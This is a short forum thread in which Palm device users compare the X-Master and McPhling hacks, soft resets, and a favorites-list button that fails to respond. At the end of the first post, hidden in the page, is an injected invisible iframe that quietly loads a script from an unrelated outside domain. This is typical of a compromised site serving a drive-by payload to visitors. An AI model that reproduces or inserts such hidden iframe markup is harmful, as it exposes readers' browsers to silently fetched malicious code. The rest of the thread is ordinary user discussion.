+ Reply to Thread

X-Master and McPhling

Anybody using X-Master and McPhling? McPhiling is the only hack I have installed at the moment and I like using it rather than installing any other launcher. That being said after I installed it along with X-Master it seems I am getting more soft reset situations.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have X-Master but not McPhling. No soft reset problems here.
    ---------------
    The same thing we do every night, Pinky...

I have X-Master and:

HBX Hack, Keyboard II, McPhling, SnapCalc, Uninstall Hack, and MultiClip Hack.

And Very few Soft Resets. Matter of fact I get no less Soft Resets by NOT using any of these hacks!

Well - maybe it is just a coincidence. I'll keep track. Thanks for the feedback.

I have Mcphling and Xmaster.

Are all of you able to select a program from your favorites list with the "ok" button?
    I cannot. I can scroll through the programs with the toggle, but the "ok" button does nothing.

Also, I seem to get a soft reset if I leave the favorites list open too long (more then a minute).

OK doesn't work for me either but I always use the stylus so it doesn't bother me.

I haven't noticed the soft reset problem but that might be that my display is set to turn off in one minute.